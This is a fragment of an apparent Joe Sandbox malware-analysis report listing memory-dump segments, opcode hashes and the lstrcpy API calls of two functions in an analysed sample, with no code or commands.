                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 8a64e526a3d252d04f4f2bf2cea257082e6924de4fca062d89ffe83649e8046b
                                • Instruction ID: 33cbe13a2ff1d3565dc81de2478e14064a18e7527673a0cfffd26e6d59da99c5
                                • Opcode Fuzzy Hash: 8a64e526a3d252d04f4f2bf2cea257082e6924de4fca062d89ffe83649e8046b
                                • Instruction Fuzzy Hash: 8E31C7B4A11B429FC764DF3AC554A62B7E5FF8A300740492DE896C7B10DB34F851CB90
                                Function 006C1610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 006C162D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C164F
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1671
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1693
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 19b6b4a7356631758f13b4d49c98c8dd0d2768c54c0b807ade70ba85688bdcbb
                                • Instruction ID: d496baf819f82715dd3d514373fd61762038cf77e352591b3fcd8c33945fcbd8
                                • Opcode Fuzzy Hash: 19b6b4a7356631758f13b4d49c98c8dd0d2768c54c0b807ade70ba85688bdcbb
                                • Instruction Fuzzy Hash: 7B110A74A11B039BDB249F76D418E36B7F9FF46301708452DA89AC7B41EB34E851CB94